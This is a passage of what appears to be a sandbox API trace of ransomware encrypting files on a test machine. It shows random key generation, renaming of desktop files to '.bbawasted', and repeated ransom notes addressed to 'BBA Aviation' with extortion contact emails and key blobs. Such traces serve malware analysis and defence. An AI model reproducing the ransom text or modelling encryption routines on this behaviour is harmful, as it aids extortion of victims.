dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0209.919] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2530 | out: hHeap=0x660000) returned 1 [0209.919] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0209.920] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0209.920] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0209.920] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tLf6_R8gXIDgGcmGELf.ppt") returned 51 [0209.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6a17c0 [0209.920] lstrcpyW (in: lpString1=0x6a1826, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.920] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.921] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6ce0) returned 1 [0209.921] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.921] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0209.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tLf6_R8gXIDgGcmGELf.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\tlf6_r8gxidggcmgelf.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0209.922] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.923] SetEndOfFile (hFile=0x290) returned 1 [0209.924] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.924] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.924] lstrcpyW (in: lpString1=0x6a1826, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tLf6_R8gXIDgGcmGELf.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\tlf6_r8gxidggcmgelf.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tLf6_R8gXIDgGcmGELf.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\tlf6_r8gxidggcmgelf.ppt.bbawasted")) returned 1 [0209.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tLf6_R8gXIDgGcmGELf.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\tlf6_r8gxidggcmgelf.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0209.925] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0209.926] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xcf15 [0209.926] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcf15) returned 0x5f0000 [0209.926] CloseHandle (hObject=0x280) returned 1 [0209.931] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0209.931] CloseHandle (hObject=0x27c) returned 1 [0209.931] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.932] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0209.932] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.932] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0209.932] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a63d8) returned 1 [0209.933] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0209.933] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0209.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.942] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QusT18xgyKbVA0g7ZP8wfKGMmQQV+foIVKr2K/CZKxlI8uvbJGNl9hLzkj8h9RYE\r\ntoF43+Agz0NCaHCS7uGOhZOD/jrWEp/+RgMlB1oiLzyJyplgTpZhov2OvlhYiaIU\r\n2PZGdaHPyAXEAWkpg3ak0xDAZa9CFhZCL1b/UNiCFj2KERCpmSlMPnfjLB6FKnSP\r\nVIjVwFcy97hLCKUmYTjA6ytwASPZfIU5bpvI4VKg4R5ajU3f+9ErQvYBoUrnVg0g\r\npp1btqESuOsxTCEbHRGnxB1Gx0Sj8zioBbDMYxtcIon6VbJmIE1vgvZH3L31Vp1s\r\nOjjzkHY13VTF6+D+MDk5hYHl2Bcwaz+Fe3lYBGCWUnPbvzjpmZXHtP30cYPafiUJ\r\nHQWzusYlNJOskY8rBeLcw/TeqlayU7ENa93H/qgka1EYg1HjX01yGpoxh8uNnbkY\r\n73TibFQp6uCPs8Ep9H9DOYZxTnkF8IKrF4uZwJs3PCGxE6AL/8wjW844F8rWEQr6\r\n1yi703wN18OBszKIXyw7nKWziKChck3Lw7D+XJTbqiADWG0OOAUj7KzqcRTkVfZO\r\nhTOghplqHkll/U1LqiCzyY/SfjgIYdsyhdRAttPqh92uPNsUEcrOLpaL/kCt1VZZ\r\n+6QkjelBqdGQbDxixCOvTU+QE216rPelMdOwJSlewqV=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.942] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0209.942] SetEndOfFile (hFile=0x290) returned 1 [0209.944] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.944] CloseHandle (hObject=0x290) returned 1 [0209.948] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a17c0 | out: hHeap=0x660000) returned 1 [0209.948] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1930 | out: hHeap=0x660000) returned 1 [0209.948] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6a38) returned 1 [0209.949] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0209.949] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0209.949] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tUha-VwhdFD.docx") returned 44 [0209.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6adb18 [0209.949] lstrcpyW (in: lpString1=0x6adb70, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.950] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.950] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0209.950] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.950] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0209.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tUha-VwhdFD.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\tuha-vwhdfd.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0209.951] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.952] SetEndOfFile (hFile=0x290) returned 1 [0209.953] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.953] lstrcpyW (in: lpString1=0x6adb70, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tUha-VwhdFD.docx" (normalized: "c:\\users\\fd1hvy\\desktop\\tuha-vwhdfd.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tUha-VwhdFD.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\tuha-vwhdfd.docx.bbawasted")) returned 1 [0209.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\tUha-VwhdFD.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\tuha-vwhdfd.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0209.954] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0209.954] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x110b3 [0209.954] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x110b3) returned 0x5f0000 [0209.954] CloseHandle (hObject=0x27c) returned 1 [0210.265] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0210.266] CloseHandle (hObject=0x280) returned 1 [0210.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0210.266] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6b48) returned 1 [0210.267] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0210.267] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0210.267] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a68a0) returned 1 [0210.268] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0210.268] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0210.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0210.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0210.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.279] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]el+7+aT2aCaM/L1greI2a8sLFQQCtYyqwRYp1cQUGa05+aeKOaMzQ1aGBZPw9Ofm\r\nS1S0DtsjMabBTNrBf4yBMQ8cs8mFBPN0SogvJfNSRgmgjyJLP6kB7lw/LdPZacp6\r\nJMtjO5Xyc5rkOfR7pw5EeajXr0ZIMxPwuzMvARlEX3IW9KP++NmvVZ7Zcyhivd39\r\nO+l/sdEtHSj0tfkHb7yyxyLIJ/IAROSc3YkoYwf4WOKbjXotFobUE8a9ai9tMjph\r\nz8JqzmbPTMf06IcjK/MjQUCcdMG072qGICaqXxscyJwRl7dSPJU6CDvXDkgSv2i+\r\nzcopjT9QPq1CXuTAYk9w+3TNn8bpXUiQZ3lEym7dNr+byvb6erxtDwAe0ZbV/VY+\r\nbypKn0kt3rYmlJQyxB7lCC7rm9eJUn0AXEUyT2vmHVCjQEoHMZiIDteMXtYmEvrZ\r\n6T3FUTeqfQalLhPIt0iQKpRrfl8LweJlu07KWjYyAyEEPWhPNEmzelA6cBf6daf7\r\n80KGhO4WVoSvAhzi+7f/VqCMtaenL7rpqXeWN9BJyFE8R4tgiRWZrVV7jdF805QC\r\nICtOh4DO4e2BdpOAxTz4l9At16/p4qr9YzSBuvY0ukX284XBnR9PWQFCYPOcqN23\r\nCAgJkXgMhEAJQpcYuu/7Guz+g4XS5PyJJDV9fEd0K4x=[end_key]\r\nKEEP IT\r\n") returned 984 [0210.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0210.279] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0210.280] SetEndOfFile (hFile=0x290) returned 1 [0210.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.282] CloseHandle (hObject=0x290) returned 1 [0210.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0210.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af758 | out: hHeap=0x660000) returned 1 [0210.291] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6570) returned 1 [0210.292] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0210.292] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0210.292] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WHk1aSv.ppt") returned 39 [0210.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x6adb18 [0210.292] lstrcpyW (in: lpString1=0x6adb66, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0210.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0210.292] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6460) returned 1 [0210.293] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0210.293] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0210.293] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WHk1aSv.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\whk1asv.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0210.294] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0210.296] SetEndOfFile (hFile=0x290) returned 1 [0210.296] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0210.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0210.296] lstrcpyW (in: lpString1=0x6adb66, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0210.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WHk1aSv.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\whk1asv.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WHk1aSv.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\whk1asv.ppt.bbawasted")) returned 1 [0210.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\WHk1aSv.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\whk1asv.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0210.297] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0210.298] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x147f0 [0210.298] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x147f0) returned 0x5f0000 [0210.298] CloseHandle (hObject=0x280) returned 1 [0210.306] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0210.307] CloseHandle (hObject=0x27c) returned 1 [0210.307] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0210.307] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a63d8) returned 1 [0210.307] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0210.307] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0210.308] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6708) returned 1 [0210.308] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0210.308] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0210.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0210.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0210.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0210.448] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]AtsP9fdLOYIO3Bs+daMjhZsyHJZ9IKoVAaOMcQ+v1D8zlJ3cTTPyPv9vwvzgvgq0\r\nu64cK91PNU8itbKHTjaM06NXzamEO8dx3VOF1cez7icdjXnzIcGJsf/J2OnO3r9F\r\nJP1qZNjoA6/c8uAaLjv/goUwEkI+5ErgF9ZNZNgboJ2uRSqzlnAgqi42W7dzZ7N4\r\nBH0Wn05TOnP6g3hzJz6OgGKvV3Aq5Xg5T8W246KyATFPqjyc4gHBLOpYpVh+Fmj9\r\n1H9K430Hj6BRZYDKK8r2IZBeId1sP3s1ecEsxC+I/0N+rtwK6pMCAgFcSE1IwGAZ\r\nzVjNc1MMNCvChOcDDCOktAJloMhXzgf65mPol5ljyQ13gyFfWGViwe024gvdo7qE\r\nXyc1KxF3R9LIkCmHJ0TQbrPgOJWOZOBjTZeG/3K8AJ6AkpS6+/MnqArSgD/eHfZl\r\na9dlHiMbK3IEEuTm1IbDM25ajPp0j6PllJkuyOMFkz0v1npO7DJUP2gUwreTipsR\r\nJaLLEgZxN2XypGBmz8XPSuB8ug0YfjZ8pWosBsmmGvugO82wDeEPav/isX/R3ICw\r\nI1zV66Mb5fTgWNZsPCfh1le3ZkoDfhE2Sq6p/DzU59xo4pj+NprLXR745ZMiu+5k\r\nFtB8whM7+N7yhL7priZZh31r9LhaAInxqVc+9D4Xd34=[end_key]\r\nKEEP IT\r\n") returned 984 [0210.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0210.448] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0210.448] SetEndOfFile (hFile=0x290) returned 1 [0211.053] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0211.053] CloseHandle (hObject=0x290) returned 1 [0211.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0211.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a33b0 | out: hHeap=0x660000) returned 1 [0211.057] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6240) returned 1 [0211.058] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0211.058] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0211.058] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\zo_QeWnuo2.jpg") returned 42 [0211.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25e) returned 0x6adb18 [0211.058] lstrcpyW (in: lpString1=0x6adb6c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0211.058] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0211.058] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6d68) returned 1 [0211.059] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0211.059] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0211.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\zo_QeWnuo2.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\zo_qewnuo2.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0211.325] WriteFile (in: hFile=0x290, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0211.327] SetEndOfFile (hFile=0x290) returned 1 [0211.686] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0211.686] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0211.686] lstrcpyW (in: lpString1=0x6adb6c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0211.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\zo_QeWnuo2.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\zo_qewnuo2.jpg"), 